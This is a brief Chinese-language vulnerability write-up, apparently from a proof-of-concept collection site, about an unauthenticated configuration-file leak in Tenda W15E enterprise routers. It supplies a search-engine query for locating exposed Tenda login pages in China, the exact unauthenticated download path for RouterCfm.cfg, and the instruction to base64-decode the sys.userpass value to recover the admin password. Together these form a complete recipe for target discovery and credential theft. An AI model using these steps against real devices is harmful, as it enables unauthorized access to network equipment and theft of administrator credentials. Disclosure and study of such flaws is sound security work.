Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞

漏洞描述

Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取,导致账号密码等敏感信息泄漏。

漏洞影响

Tenda 企业级路由器

网络测绘

title==”Tenda | Login” && country=”CN”

漏洞复现

登录页面

20240322103433682-1642645426007-dae7304a-c0b0-4e24-b622-c4c4cae93f13.bc950b60_2024-03-22_10-34-15 (1)

访问路径

/cgi-bin/DownloadCfg/RouterCfm.cfg

20240322103548269-1642645500607-fbcda323-b8f8-406d-a77a-2cea223b9f77.e8432c24_2024-03-22_10-35-08 (1)

后台账号密码位于参数 sys.userpass base64解密后的字符

20240322103643757-1642645610038-094fc290-4ccc-4579-8eef-cf7bee34344e.cf72b15e_2024-03-22_10-36-13 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容